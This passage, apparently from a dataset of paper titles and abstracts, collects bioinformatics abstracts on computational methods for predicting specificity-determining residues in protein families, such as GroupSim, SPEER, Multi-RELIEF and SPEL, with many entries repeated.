this database. Availability: The analysis of different systems, including the COG equivalent 21 genomes are available at http: //www.pdg.cnb.uam.es/GenoClustering.html Contact: [email protected] --- paper_title: Characterization and prediction of residues determining protein functional specificity paper_content: Motivation: Within a homologous protein family, proteins may be grouped into subtypes that share specific functions that are not common to the entire family. Often, the amino acids present in a small number of sequence positions determine each protein's particular function-al specificity. Knowledge of these specificity determining positions (SDPs) aids in protein function prediction, drug design and experimental analysis. A number of sequence-based computational methods have been introduced for identifying SDPs; however, their further development and evaluation have been hindered by the limited number of known experimentally determined SDPs. ::: ::: Results: We combine several bioinformatics resources to automate a process, typically undertaken manually, to build a dataset of SDPs. The resulting large dataset, which consists of SDPs in enzymes, enables us to characterize SDPs in terms of their physicochemical and evolution-ary properties. It also facilitates the large-scale evaluation of sequence-based SDP prediction methods. We present a simple sequence-based SDP prediction method, GroupSim, and show that, surprisingly, it is competitive with a representative set of current methods. We also describe ConsWin, a heuristic that considers sequence conservation of neighboring amino acids, and demonstrate that it improves the performance of all methods tested on our large dataset of enzyme SDPs. ::: ::: Availability: Datasets and GroupSim code are available online at http://compbio.cs.princeton.edu/specificity/ ::: ::: Contact: [email protected] ::: ::: Supplementary information:Supplementary data are available at Bioinformatics online. --- paper_title: Secator: A Program for Inferring Protein Subfamilies from Phylogenetic Trees paper_content: With the huge increase of protein data, an important problem is to estimate, within a large protein family, the number of sensible subsets for subsequent in-depth structural, functional, and evolutionary analyses. To tackle this problem, we developed a new program, Secator, which implements the principle of an ascending hierarchical method using a distance matrix based on a multiple alignment of protein sequences. Dissimilarity values assigned to the nodes of a deduced phylogenetic tree are partitioned by a new stopping rule introduced to automatically determine the significant dissimilarity values. The quality of the clusters obtained by Secator is verified by a separate Jackknife study. The method is demonstrated on 24 large protein families covering a wide spectrum of structural and sequence conservation and its usefulness and accuracy with real biological data is illustrated on two well-studied protein families (the Sm proteins and the nuclear receptors). --- paper_title: Sequence analysis Multi-RELIEF : a method to recognize specificity determining residues from multiple sequence alignments using a Machine-Learning approach for feature weighting paper_content: Motivation: Identification of residues that account for protein function specificity is crucial, not only for understanding the nature of functional specificity, but also for protein engineering experiments aimed at switching the specificity of an enzyme, regulator or transporter. Available algorithms generally use multiple sequence alignments to identify residue positions conserved within subfamilies but divergent in between. However, many biological examples show a much subtler picture than simple intra-group conservation versus inter-group divergence. ::: ::: Results: We present multi-RELIEF, a novel approach for identifying specificity residues that is based on RELIEF, a state-of-the-art Machine-Learning technique for feature weighting. It estimates the expected ‘local’ functional specificity of residues from an alignment divided in multiple classes. Optionally, 3D structure information is exploited by increasing the weight of residues that have high-weight neighbors. Using ROC curves over a large body of experimental reference data, we show that (a) multi-RELIEF identifies specificity residues for the seven test sets used, (b) incorporating structural information improves prediction for specificity of interaction with small molecules and (c) comparison of multi-RELIEF with four other state-of-the-art algorithms indicates its robustness and best overall performance. ::: ::: Availability: A web-server implementation of multi-RELIEF is available at www.ibi.vu.nl/programs/multirelief. Matlab source code of the algorithm and data sets are available on request for academic use. ::: ::: Contact: [email protected] ::: ::: Supplementary information: Supplemenmtary data are available at Bioinformatics online --- paper_title: BADASP: predicting functional specificity in protein families using ancestral sequences paper_content: Summary: Burst After Duplication with Ancestral Sequence Predictions (BADASP) is a software package for identifying sites that may confer subfamily-specific biological functions in protein families following functional divergence of duplicated proteins. A given protein phylogeny is grouped into subfamilies based on orthology/paralogy relationships and/or user definitions. Ancestral sequences are then predicted from the sequence alignment and the functional specificity is calculated using variants of the Burst After Duplication method, which tests for radical amino acid substitutions following gene duplications that are subsequently conserved. Statistics are output along with subfamily groupings and ancestral sequences for an easy analysis with other packages. ::: ::: Availability: BADASP is freely available from http://www.bioinformatics.rcsi.ie/~redwards/badasp/ ::: ::: Contact: [email protected] ::: ::: Supplementary information: A manual with further details can be downloaded from http://www.bioinformatics.rcsi.ie/~redwards/badasp/ --- paper_title: Classification of protein families and detection of the determinant residues with an improved self-organizing map paper_content: Using a SOM (self-organizing map) we can classify sequences within a protein family into subgroups that generally correspond to biological subcategories. These maps tend to show sequence similarity as proximity in the map. Combining maps generated at different levels of resolution, the structure of relations in protein families can be captured that could not otherwise be represented in a single map. The underlying representation of maps enables us to retrieve characteristic sequence patterns for individual subgroups of sequences. Such patterns tend to correspond to functionally important regions. We present a modified SOM algorithm that includes a convergence test that dynamically controls the learning parameters to adapt them to the learning set instead of being fixed and externally optimized by trial and error. Given the variability of protein family size and distribution, the addition of this features is necessary. The method is successfully tested with a number of families. The rab family of small GTPases is used to illustrate the performance of the method. --- paper_title: Phylogeny-independent detection of functional residues paper_content: Motivation: Current projects for the massive characterization of proteomes are generating protein sequences and structures with unknown function. The difficulty of experimentally determining functionally important sites calls for the development of computational methods. The first techniques, based on the search for fully conserved positions in multiple sequence alignments (MSAs), were followed by methods for locating family-dependent conserved positions. These rely on the functional classification implicit in the alignment for locating these positions related with functional specificity. The next obvious step, still scarcely explored, is to detect these positions using a functional classification different from the one implicit in the sequence relationships between the proteins. Here, we present two new methods for locating functional positions which can incorporate an arbitrary external functional classification which may or may not coincide with the one implicit in the MSA. The Xdet method is able to use a functional classification with an associated hierarchy or similarity between functions to locate positions related to that classification. The MCdet method uses multivariate statistical analysis to locate positions responsible for each one of the functions within a multifunctional family. ::: ::: Results: We applied the methods to different cases, illustrating scenarios where there is a disagreement between the functional and the phylogenetic relationships, and demonstrated their usefulness for the phylogeny-independent prediction of functional positions. ::: ::: Availability: All computer programs and datasets used in this work are available from the authors for academic use. ::: ::: Contact: [email protected] ::: ::: Supplementary information: Supplementary data are available at http://pdg.cnb.uam.es/pazos/Xdet_MCdet_Add/ --- paper_title: Automatic clustering of orthologs and in-paralogs from pairwise species comparisons paper_content: Orthologs are genes in different species that originate from a single gene in the last common ancestor of these species. Such genes have often retained identical biological roles in the present-day organisms. It is hence important to identify orthologs for transferring functional information between genes in different organisms with a high degree of reliability. For example, orthologs of human proteins are often functionally characterized in model organisms. Unfortunately, orthology analysis between human and e.g. invertebrates is often complex because of large numbers of paralogs within protein families. Paralogs that predate the species split, which we call out-paralogs, can easily be confused with true orthologs. Paralogs that arose after the species split, which we call in-paralogs, however, are bona fide orthologs by definition. Orthologs and in-paralogs are typically detected with phylogenetic methods, but these are slow and difficult to automate. Automatic clustering methods based on two-way best genome-wide matches on the other hand, have so far not separated in-paralogs from out-paralogs effectively. We present a fully automatic method for finding orthologs and in-paralogs from two species. Ortholog clusters are seeded with a two-way best pairwise match, after which an algorithm for adding in-paralogs is applied. The method bypasses multiple alignments and phylogenetic trees, which can be slow and error-prone steps in classical ortholog detection. Still, it robustly detects complex orthologous relationships and assigns confidence values for both orthologs and in-paralogs. The program, called INPARANOID, was tested on all completely sequenced eukaryotic genomes. To assess the quality of INPARANOID results, ortholog clusters were generated from a dataset of worm and mammalian transmembrane proteins, and were compared to clusters derived by manual tree-based ortholog detection methods. This study led to the identification with a high degree of confidence of over a dozen novel worm-mammalian ortholog assignments that were previously undetected because of shortcomings of phylogenetic methods.A WWW server that allows searching for orthologs between human and several fully sequenced genomes is installed at http://www.cgb.ki.se/inparanoid/. This is the first comprehensive resource with orthologs of all fully sequenced eukaryotic genomes. Programs and tables of orthology assignments are available from the same location. --- paper_title: Sequence comparison by sequence harmony identifies subtype-specific functional sites paper_content: Multiple sequence alignments are often used to reveal functionally important residues within a protein family. They can be particularly useful for the identification of key residues that determine functional differences between protein subfamilies. We present a new entropy-based method, Sequence Harmony (SH) that accurately detects subfamily-specific positions from a multiple sequence alignment. The SH algorithm implements a novel formula, able to score compositional differences between subfamilies, without imposing conservation, in a simple manner on an intuitive scale. We compare our method with the most important published methods, i.e. AMAS, TreeDet and SDP-pred, using three well-studied protein families: the receptor-binding domain (MH2) of the Smad family of transcription factors, the Ras-superfamily of small GTPases and the MIP-family of integral membrane transporters. We demonstrate that SH accurately selects known functional sites with higher coverage than the other methods for these test-cases. This shows that compositional differences between protein subfamilies provide sufficient basis for identification of functional sites. In addition, SH selects a number of sites of unknown function that could be interesting candidates for further experimental investigation. --- paper_title: SDPpred: a tool for prediction of amino acid residues that determine differences in functional specificity of homologous proteins. paper_content: SDPpred (Specificity Determining Position prediction) is a tool for prediction of residues in protein sequences that determine the proteins' functional specificity. It is designed for analysis of protein families whose members have biochemically similar but not identical interaction partners (e.g. different substrates for a family of transporters). SDPpred predicts residues that could be responsible for the proteins' choice of their correct interaction partners. The input of SDPpred is a multiple alignment of a protein family divided into a number of specificity groups, within which the interaction partner is believed to be the same. SDPpred does not require information about the secondary or three-dimensional structure of proteins. It produces a set of the alignment positions (specificity determining positions) that determine differences in functional specificity. SDPpred is available at http://math.genebee.msu.ru/~psn/. --- paper_title: SPEER-SERVER: a web server for prediction of protein specificity determining sites paper_content: Sites that show specific conservation patterns within subsets of proteins in a protein family are likely to be involved in the development of functional specificity. These sites, generally termed specificity determining sites (SDS), might play a crucial role in binding to a specific substrate or proteins. Identification of SDS through experimental techniques is a slow, difficult and tedious job. Hence, it is very important to develop efficient computational methods that can more expediently identify SDS. Herein, we present Specificity prediction using amino acids’ Properties, Entropy and Evolution Rate (SPEER)-SERVER, a web server that predicts SDS by analyzing quantitative measures of the conservation patterns of protein sites based on their physico-chemical properties and the heterogeneity of evolutionary changes between and within the protein subfamilies. This web server provides an improved representation of results, adds useful input and output options and integrates a wide range of analysis and data visualization tools when compared with the original standalone version of the SPEER algorithm. Extensive benchmarking finds that SPEER-SERVER exhibits sensitivity and precision performance that, on average, meets or exceeds that of other currently available methods. SPEER-SERVER is available at http://www.hpppi.iicb.res.in/ss/. --- paper_title: Ensemble approach to predict specificity determinants: benchmarking and validation paper_content: BackgroundIt is extremely important and challenging to identify the sites that are responsible for functional specification or diversification in protein families. In this study, a rigorous comparative benchmarking protocol was employed to provide a reliable evaluation of methods which predict the specificity determining sites. Subsequently, three best performing methods were applied to identify new potential specificity determining sites through ensemble approach and common agreement of their prediction results.ResultsIt was shown that the analysis of structural characteristics of predicted specificity determining sites might provide the means to validate their prediction accuracy. For example, we found that for smaller distances it holds true that the more reliable the prediction method is, the closer predicted specificity determining sites are to each other and to the ligand.ConclusionWe observed certain similarities of structural features between predicted and actual subsites which might point to their functional relevance. We speculate that majority of the identified potential specificity determining sites might be indirectly involved in specific interactions and could be ideal target for mutagenesis experiments. --- paper_title: Functional specificity lies within the properties and evolutionary changes of amino acids. paper_content: The rapid increase in the amount of protein sequence data has created a need for automated identification of sites that determine functional specificity among related subfamilies of proteins. A significant fraction of subfamily specific sites are only marginally conserved, which makes it extremely challenging to detect those amino acid changes that lead to functional diversification. To address this critical problem we developed a method named SPEER (specificity prediction using amino acids' properties, entropy and evolution rate) to distinguish specificity determining sites from others. SPEER encodes the conservation patterns of amino acid types using their physico-chemical properties and the heterogeneity of evolutionary changes between and within the subfamilies. To test the method, we compiled a test set containing 13 protein families with known specificity determining sites. Extensive benchmarking by comparing the performance of SPEER with other specificity site prediction algorithms has shown that it performs better in predicting several categories of subfamily specific sites. --- paper_title: Characterization and prediction of residues determining protein functional specificity paper_content: Motivation: Within a homologous protein family, proteins may be grouped into subtypes that share specific functions that are not common to the entire family. Often, the amino acids present in a small number of sequence positions determine each protein's particular function-al specificity. Knowledge of these specificity determining positions (SDPs) aids in protein function prediction, drug design and experimental analysis. A number of sequence-based computational methods have been introduced for identifying SDPs; however, their further development and evaluation have been hindered by the limited number of known experimentally determined SDPs. ::: ::: Results: We combine several bioinformatics resources to automate a process, typically undertaken manually, to build a dataset of SDPs. The resulting large dataset, which consists of SDPs in enzymes, enables us to characterize SDPs in terms of their physicochemical and evolution-ary properties. It also facilitates the large-scale evaluation of sequence-based SDP prediction methods. We present a simple sequence-based SDP prediction method, GroupSim, and show that, surprisingly, it is competitive with a representative set of current methods. We also describe ConsWin, a heuristic that considers sequence conservation of neighboring amino acids, and demonstrate that it improves the performance of all methods tested on our large dataset of enzyme SDPs. ::: ::: Availability: Datasets and GroupSim code are available online at http://compbio.cs.princeton.edu/specificity/ ::: ::: Contact: [email protected] ::: ::: Supplementary information:Supplementary data are available at Bioinformatics online. --- paper_title: Multi-Harmony: detecting functional specificity from sequence alignment paper_content: Many protein families contain sub-families with functional specialization, such as binding different ligands or being involved in different protein-protein interactions. A small number of amino acids generally determine functional specificity. The identification of these residues can aid the understanding of protein function and help finding targets for experimental analysis. Here, we present multi-Harmony, an interactive web sever for detecting sub-type-specific sites in proteins starting from a multiple sequence alignment. Combining our Sequence Harmony (SH) and multi-Relief (mR) methods in one web server allows simultaneous analysis and comparison of specificity residues; furthermore, both methods have been significantly improved and extended. SH has been extended to cope with more than two sub-groups. mR has been changed from a sampling implementation to a deterministic one, making it more consistent and user friendly. For both methods Z-scores are reported. The multi-Harmony web server produces a dynamic output page, which includes interactive connections to the Jalview and Jmol applets, thereby allowing interactive analysis of the results. Multi-Harmony is available at http://www.ibi.vu.nl/ programs/shmrwww. --- paper_title: Phylogeny-independent detection of functional residues paper_content: Motivation: Current projects for the massive characterization of proteomes are generating protein sequences and structures with unknown function. The difficulty of experimentally determining functionally important sites calls for the development of computational methods. The first techniques, based on the search for fully conserved positions in multiple sequence alignments (MSAs), were followed by methods for locating family-dependent conserved positions. These rely on the functional classification implicit in the alignment for locating these positions related with functional specificity. The next obvious step, still scarcely explored, is to detect these positions using a functional classification different from the one implicit in the sequence relationships between the proteins. Here, we present two new methods for locating functional positions which can incorporate an arbitrary external functional classification which may or may not coincide with the one implicit in the MSA. The Xdet method is able to use a functional classification with an associated hierarchy or similarity between functions to locate positions related to that classification. The MCdet method uses multivariate statistical analysis to locate positions responsible for each one of the functions within a multifunctional family. ::: ::: Results: We applied the methods to different cases, illustrating scenarios where there is a disagreement between the functional and the phylogenetic relationships, and demonstrated their usefulness for the phylogeny-independent prediction of functional positions. ::: ::: Availability: All computer programs and datasets used in this work are available from the authors for academic use. ::: ::: Contact: [email protected] ::: ::: Supplementary information: Supplementary data are available at http://pdg.cnb.uam.es/pazos/Xdet_MCdet_Add/ --- paper_title: Prediction of functional specificity determinants from protein sequences using log-likelihood ratios paper_content: Motivation: A number of methods have been developed to predict functional specificity determinants in protein families based on sequence information. Most of these methods rely on pre-defined functional subgroups. Manual subgroup definition is difficult because of the limited number of experimentally characterized subfamilies with differing specificity, while automatic subgroup partitioning using computational tools is a non-trivial task and does not always yield ideal results. ::: ::: Results: We propose a new approach SPEL (specificity positions by evolutionary likelihood) to detect positions that are likely to be functional specificity determinants. SPEL, which does not require subgroup definition, takes a multiple sequence alignment of a protein family as the only input, and assigns a P-value to every position in the alignment. Positions with low P-values are likely to be important for functional specificity. An evolutionary tree is reconstructed during the calculation, and P-value estimation is based on a random model that involves evolutionary simulations. Evolutionary log-likelihood is chosen as a measure of amino acid distribution at a position. To illustrate the performance of the method, we carried out a detailed analysis of two protein families (LacI/PurR and G protein α subunit), and compared our method with two existing methods (evolutionary trace and mutual information based). All three methods were also compared on a set of protein families with known ligand-bound structures. ::: ::: Availability: SPEL is freely available for non-commercial use. Its pre-compiled versions for several platforms and alignments used in this work are available at ftp://iole.swmed.edu/pub/SPEL/ ::: ::: Contact:[email protected]. ::: ::: Supplementary information: Supplementary materials are available at ftp:/iole.swmed.edu/pub/SPEL/ --- paper_title: SPEER-SERVER: a web server for prediction of protein specificity determining sites paper_content: Sites that show specific conservation patterns within subsets of proteins in a protein family are likely to be involved in the development of functional specificity. These sites, generally termed specificity determining sites (SDS), might play a crucial role in binding to a specific substrate or proteins. Identification of SDS through experimental techniques is a slow, difficult and tedious job. Hence, it is very important to develop efficient computational methods that can more expediently identify SDS. Herein, we present Specificity prediction using amino acids’ Properties, Entropy and Evolution Rate (SPEER)-SERVER, a web server that predicts SDS by analyzing quantitative measures of the conservation patterns of protein sites based on their physico-chemical properties and the heterogeneity of evolutionary changes between and within the protein subfamilies. This web server provides an improved representation of results, adds useful input and output options and integrates a wide range of analysis and data visualization tools when compared with the original standalone version of the SPEER algorithm. Extensive benchmarking finds that SPEER-SERVER exhibits sensitivity and precision performance that, on average, meets or exceeds that of other currently available methods. SPEER-SERVER is available at http://www.hpppi.iicb.res.in/ss/. --- paper_title: Predicting functional divergence in protein evolution by site-specific rate shifts. paper_content: Most modern tools that analyze protein evolution allow individual sites to mutate at constant rates over the history of the protein family. However, Walter Fitch observed in the 1970s that, if a protein changes its function, the mutability of individual sites might also change. This observation is captured in the "non-homogeneous gamma model", which extracts functional information from gene families by examining the different rates at which individual sites evolve. This model has recently been coupled with structural and molecular biology to identify sites that are likely to be involved in changing function within the gene family. Applying this to multiple gene families highlights the widespread divergence of functional behavior among proteins to generate paralogs and orthologs. --- paper_title: Functional specificity lies within the properties and evolutionary changes of amino acids. paper_content: The rapid increase in the amount of protein sequence data has created a need for automated identification of sites that determine functional specificity among related subfamilies of proteins. A significant fraction of subfamily specific sites are only marginally conserved, which makes it extremely challenging to detect those amino acid changes that lead to functional diversification. To address this critical problem we developed a method named SPEER (specificity prediction using amino acids' properties, entropy and evolution rate) to distinguish specificity determining sites from others. SPEER encodes the conservation patterns of amino acid types using their physico-chemical properties and the heterogeneity of evolutionary changes between and within the subfamilies. To test the method, we compiled a test set containing 13 protein families with known specificity determining sites. Extensive benchmarking by comparing the performance of SPEER with other specificity site prediction algorithms has shown that it performs better in predicting several categories of subfamily specific sites. --- paper_title: Characterization and prediction of residues determining protein functional specificity paper_content: Motivation: Within a homologous protein family, proteins may be grouped into subtypes that share specific functions that are not common to the entire family. Often, the amino acids present in a small number of sequence positions determine each protein's particular function-al specificity. Knowledge of these specificity determining positions (SDPs) aids in protein function prediction, drug design and experimental analysis. A number of sequence-based computational methods have been introduced for identifying SDPs; however, their further development and evaluation have been hindered by the limited number of known experimentally determined SDPs. ::: ::: Results: We combine several bioinformatics resources to automate a process, typically undertaken manually, to build a dataset of SDPs. The resulting large dataset, which consists of SDPs in enzymes, enables us to characterize SDPs in terms of their physicochemical and evolution-ary properties. It also facilitates the large-scale evaluation of sequence-based SDP prediction methods. We present a simple sequence-based SDP prediction method, GroupSim, and show that, surprisingly, it is competitive with a representative set of current methods. We also describe ConsWin, a heuristic that considers sequence conservation of neighboring amino acids, and demonstrate that it improves the performance of all methods tested on our large dataset of enzyme SDPs. ::: ::: Availability: Datasets and GroupSim code are available online at http://compbio.cs.princeton.edu/specificity/ ::: ::: Contact: [email protected] ::: ::: Supplementary information:Supplementary data are available at Bioinformatics online. --- paper_title: Sequence analysis Multi-RELIEF : a method to recognize specificity determining residues from multiple sequence alignments using a Machine-Learning approach for feature weighting paper_content: Motivation: Identification of residues that account for protein function specificity is crucial, not only for understanding the nature of functional specificity, but also for protein engineering experiments aimed at switching the specificity of an enzyme, regulator or transporter. Available algorithms generally use multiple sequence alignments to identify residue positions conserved within subfamilies but divergent in between. However, many biological examples show a much subtler picture than simple intra-group conservation versus inter-group divergence. ::: ::: Results: We present multi-RELIEF, a novel approach for identifying specificity residues that is based on RELIEF, a state-of-the-art Machine-Learning technique for feature weighting. It estimates the expected ‘local’ functional specificity of residues from an alignment divided in multiple classes. Optionally, 3D structure information is exploited by increasing the weight of residues that have high-weight neighbors. Using ROC curves over a large body of experimental reference data, we show that (a) multi-RELIEF identifies specificity residues for the seven test sets used, (b) incorporating structural information improves prediction for specificity of interaction with small molecules and (c) comparison of multi-RELIEF with four other state-of-the-art algorithms indicates its robustness and best overall performance. ::: ::: Availability: A web-server implementation of multi-RELIEF is available at www.ibi.vu.nl/programs/multirelief. Matlab source code of the algorithm and data sets are available on request for academic use. ::: ::: Contact: [email protected] ::: ::: Supplementary information: Supplemenmtary data are available at Bioinformatics online --- paper_title: Multi-Harmony: detecting functional specificity from sequence alignment paper_content: Many protein families contain sub-families with functional specialization, such as binding different ligands or being involved in different protein-protein interactions. A small number of amino acids generally determine functional specificity. The identification of these residues can aid the understanding of protein function and help finding targets for experimental analysis. Here, we present multi-Harmony, an interactive web sever for detecting sub-type-specific sites in proteins starting from a multiple sequence alignment. Combining our Sequence Harmony (SH) and multi-Relief (mR) methods in one web server allows simultaneous analysis and comparison of specificity residues; furthermore, both methods have been significantly improved and extended. SH has been extended to cope with more than two sub-groups. mR has been changed from a sampling implementation to a deterministic one, making it more consistent and user friendly. For both methods Z-scores are reported. The multi-Harmony web server produces a dynamic output page, which includes interactive connections to the Jalview and Jmol applets, thereby allowing interactive analysis of the results. Multi-Harmony is available at http://www.ibi.vu.nl/ programs/shmrwww. --- paper_title: Phylogeny-independent detection of functional residues paper_content: Motivation: Current projects for the massive characterization of proteomes are generating protein sequences and structures with unknown function. The difficulty of experimentally determining functionally important sites calls for the development of computational methods. The first techniques, based on the search for fully conserved positions in multiple sequence alignments (MSAs), were followed by methods for locating family-dependent conserved positions. These rely on the functional classification implicit in the alignment for locating these positions related with functional specificity. The next obvious step, still scarcely explored, is to detect these positions using a functional classification different from the one implicit in the sequence relationships between the proteins. Here, we present two new methods for locating functional positions which can incorporate an arbitrary external functional classification which may or may not coincide with the one implicit in the MSA. The Xdet method is able to use a functional classification with an associated hierarchy or similarity between functions to locate positions related to that classification. The MCdet method uses multivariate statistical analysis to locate positions responsible for each one of the functions within a multifunctional family. ::: ::: Results: We applied the methods to different cases, illustrating scenarios where there is a disagreement between the functional and the phylogenetic relationships, and demonstrated their usefulness for the phylogeny-independent prediction of functional positions. ::: ::: Availability: All computer programs and datasets used in this work are available from the authors for academic use. ::: ::: Contact: [email protected] ::: ::: Supplementary information: Supplementary data are available at http://pdg.cnb.uam.es/pazos/Xdet_MCdet_Add/ --- paper_title: AL2CO: calculation of positional conservation in a protein sequence alignment paper_content: MOTIVATION ::: Amino acid sequence alignments are widely used in the analysis of protein structure, function and evolutionary relationships. Proteins within a superfamily usually share the same fold and possess related functions. These structural and functional constraints are reflected in the alignment conservation patterns. Positions of functional and/or structural importance tend to be more conserved. Conserved positions are usually clustered in distinct motifs surrounded by sequence segments of low conservation. Poorly conserved regions might also arise from the imperfections in multiple alignment algorithms and thus indicate possible alignment errors. Quantification of conservation by attributing a conservation index to each aligned position makes motif detection more convenient. Mapping these conservation indices onto a protein spatial structure helps to visualize spatial conservation features of the molecule and to predict functionally and/or structurally important sites. Analysis of conservation indices could be a useful tool in detection of potentially misaligned regions and will aid in improvement of multiple alignments. ::: ::: ::: RESULTS ::: We developed a program to calculate a conservation index at each position in a multiple sequence alignment using several methods. Namely, amino acid frequencies at each position are estimated and the conservation index is calculated from these frequencies. We utilize both unweighted frequencies and frequencies weighted using two different strategies. Three conceptually different approaches (entropy-based, variance-based and matrix score-based) are implemented in the algorithm to define the conservation index. Calculating conservation indices for 35522 positions in 284 alignments from SMART database we demonstrate that different methods result in highly correlated (correlation coefficient more than 0.85) conservation indices. Conservation indices show statistically significant correlation between sequentially adjacent positions i and i + j, where j < 13, and averaging of the indices over the window of three positions is optimal for motif detection. Positions with gaps display substantially lower conservation properties. We compare conservation properties of the SMART alignments or FSSP structural alignments to those of the ClustalW alignments. The results suggest that conservation indices should be a valuable tool of alignment quality assessment and might be used as an objective function for refinement of multiple alignments. ::: ::: ::: AVAILABILITY ::: The C code of the AL2CO program and its pre-compiled versions for several platforms as well as the details of the analysis are freely available at ftp://iole.swmed.edu/pub/al2co/. --- paper_title: SPEER-SERVER: a web server for prediction of protein specificity determining sites paper_content: Sites that show specific conservation patterns within subsets of proteins in a protein family are likely to be involved in the development of functional specificity. These sites, generally termed specificity determining sites (SDS), might play a crucial role in binding to a specific substrate or proteins. Identification of SDS through experimental techniques is a slow, difficult and tedious job. Hence, it is very important to develop efficient computational methods that can more expediently identify SDS. Herein, we present Specificity prediction using amino acids’ Properties, Entropy and Evolution Rate (SPEER)-SERVER, a web server that predicts SDS by analyzing quantitative measures of the conservation patterns of protein sites based on their physico-chemical properties and the heterogeneity of evolutionary changes between and within the protein subfamilies. This web server provides an improved representation of results, adds useful input and output options and integrates a wide range of analysis and data visualization tools when compared with the original standalone version of the SPEER algorithm. Extensive benchmarking finds that SPEER-SERVER exhibits sensitivity and precision performance that, on average, meets or exceeds that of other currently available methods. SPEER-SERVER is available at http://www.hpppi.iicb.res.in/ss/. --- paper_title: Characterization and prediction of residues determining protein functional specificity paper_content: Motivation: Within a homologous protein family, proteins may be grouped into subtypes that share specific functions that are not common to the entire family. Often, the amino acids present in a small number of sequence positions determine each protein's particular function-al specificity. Knowledge of these specificity determining positions (SDPs) aids in protein function prediction, drug design and experimental analysis. A number of sequence-based computational methods have been introduced for identifying SDPs; however, their further development and evaluation have been hindered by the limited number of known experimentally determined SDPs. ::: ::: Results: We combine several bioinformatics resources to automate a process, typically undertaken manually, to build a dataset of SDPs. The resulting large dataset, which consists of SDPs in enzymes, enables us to characterize SDPs in terms of their physicochemical and evolution-ary properties. It also facilitates the large-scale evaluation of sequence-based SDP prediction methods. We present a simple sequence-based SDP prediction method, GroupSim, and show that, surprisingly, it is competitive with a representative set of current methods. We also describe ConsWin, a heuristic that considers sequence conservation of neighboring amino acids, and demonstrate that it improves the performance of all methods tested on our large dataset of enzyme SDPs. ::: ::: Availability: Datasets and GroupSim code are available online at http://compbio.cs.princeton.edu/specificity/ ::: ::: Contact: [email protected] ::: ::: Supplementary information:Supplementary data are available at Bioinformatics online. --- paper_title: The Gene Ontology (GO) database and informatics resource. paper_content: The Gene Ontology (GO) project (http://www. geneontology.org/) provides structured, controlled vocabularies and classifications that cover several domains of molecular and cellular biology and are freely available for community use in the annotation of genes, gene products and sequences. Many model organism databases and genome annotation groups use the GO and contribute their annotation sets to the GO resource. The GO database integrates the vocabularies and contributed annotations and provides full access to this information in several formats. Members of the GO Consortium continually work collectively, involving outside experts as needed, to expand and update the GO vocabularies. The GO Web resource also provides access to extensive documentation about the GO project and links to applications that use GO data for functional analyses. --- paper_title: Characterization and prediction of residues determining protein functional specificity paper_content: Motivation: Within a homologous protein family, proteins may be grouped into subtypes that share specific functions that are not common to the entire family. Often, the amino acids present in a small number of sequence positions determine each protein's particular function-al specificity. Knowledge of these specificity determining positions (SDPs) aids in protein function prediction, drug design and experimental analysis. A number of sequence-based computational methods have been introduced for identifying SDPs; however, their further development and evaluation have been hindered by the limited number of known experimentally determined SDPs. ::: ::: Results: We combine several bioinformatics resources to automate a process, typically undertaken manually, to build a dataset of SDPs. The resulting large dataset, which consists of SDPs in enzymes, enables us to characterize SDPs in terms of their physicochemical and evolution-ary properties. It also facilitates the large-scale evaluation of sequence-based SDP prediction methods. We present a simple sequence-based SDP prediction method, GroupSim, and show that, surprisingly, it is competitive with a representative set of current methods. We also describe ConsWin, a heuristic that considers sequence conservation of neighboring amino acids, and demonstrate that it improves the performance of all methods tested on our large dataset of enzyme SDPs. ::: ::: Availability: Datasets and GroupSim code are available online at http://compbio.cs.princeton.edu/specificity/ ::: ::: Contact: [email protected] ::: ::: Supplementary information:Supplementary data are available at Bioinformatics online. --- paper_title: Phylogeny-independent detection of functional residues paper_content: Motivation: Current projects for the massive characterization of proteomes are generating protein sequences and structures with unknown function. The difficulty of experimentally determining functionally important sites calls for the development of computational methods. The first techniques, based on the search for fully conserved positions in multiple sequence alignments (MSAs), were followed by methods for locating family-dependent conserved positions. These rely on the functional classification implicit in the alignment for locating these positions related with functional specificity. The next obvious step, still scarcely explored, is to detect these positions using a functional classification different from the one implicit in the sequence relationships between the proteins. Here, we present two new methods for locating functional positions which can incorporate an arbitrary external functional classification which may or may not coincide with the one implicit in the MSA. The Xdet method is able to use a functional classification with an associated hierarchy or similarity between functions to locate positions related to that classification. The MCdet method uses multivariate statistical analysis to locate positions responsible for each one of the functions within a multifunctional family. ::: ::: Results: We applied the methods to different cases, illustrating scenarios where there is a disagreement between the functional and the phylogenetic relationships, and demonstrated their usefulness for the phylogeny-independent prediction of functional positions. ::: ::: Availability: All computer programs and datasets used in this work are available from the authors for academic use. ::: ::: Contact: [email protected] ::: ::: Supplementary information: Supplementary data are available at http://pdg.cnb.uam.es/pazos/Xdet_MCdet_Add/ --- paper_title: Prediction of functional specificity determinants from protein sequences using log-likelihood ratios paper_content: Motivation: A number of methods have been developed to predict functional specificity determinants in protein families based on sequence information. Most of these methods rely on pre-defined functional subgroups. Manual subgroup definition is difficult because of the limited number of experimentally characterized subfamilies with differing specificity, while automatic subgroup partitioning using computational tools is a non-trivial task and does not always yield ideal results. ::: ::: Results: We propose a new approach SPEL (specificity positions by evolutionary likelihood) to detect positions that are likely to be functional specificity determinants. SPEL, which does not require subgroup definition, takes a multiple sequence alignment of a protein family as the only input, and assigns a P-value to every position in the alignment. Positions with low P-values are likely to be important for functional specificity. An evolutionary tree is reconstructed during the calculation, and P-value estimation is based on a random model that involves evolutionary simulations. Evolutionary log-likelihood is chosen as a measure of amino acid distribution at a position. To illustrate the performance of the method, we carried out a detailed analysis of two protein families (LacI/PurR and G protein α subunit), and compared our method with two existing methods (evolutionary trace and mutual information based). All three methods were also compared on a set of protein families with known ligand-bound structures. ::: ::: Availability: SPEL is freely available for non-commercial use. Its pre-compiled versions for several platforms and alignments used in this work are available at ftp://iole.swmed.edu/pub/SPEL/ ::: ::: Contact:[email protected]. ::: ::: Supplementary information: Supplementary materials are available at ftp:/iole.swmed.edu/pub/SPEL/ --- paper_title: SPEER-SERVER: a web server for prediction of protein specificity determining sites paper_content: Sites that show specific conservation patterns within subsets of proteins in a protein family are likely to be involved in the development of functional specificity. These sites, generally termed specificity determining sites (SDS), might play a crucial role in binding to a specific substrate or proteins. Identification of SDS through experimental techniques is a slow, difficult and tedious job. Hence, it is very important to develop efficient computational methods that can more expediently identify SDS. Herein, we present Specificity prediction using amino acids’ Properties, Entropy and Evolution Rate (SPEER)-SERVER, a web server that predicts SDS by analyzing quantitative measures of the conservation patterns of protein sites based on their physico-chemical properties and the heterogeneity of evolutionary changes between and within the protein subfamilies. This web server provides an improved representation of results, adds useful input and output options and integrates a wide 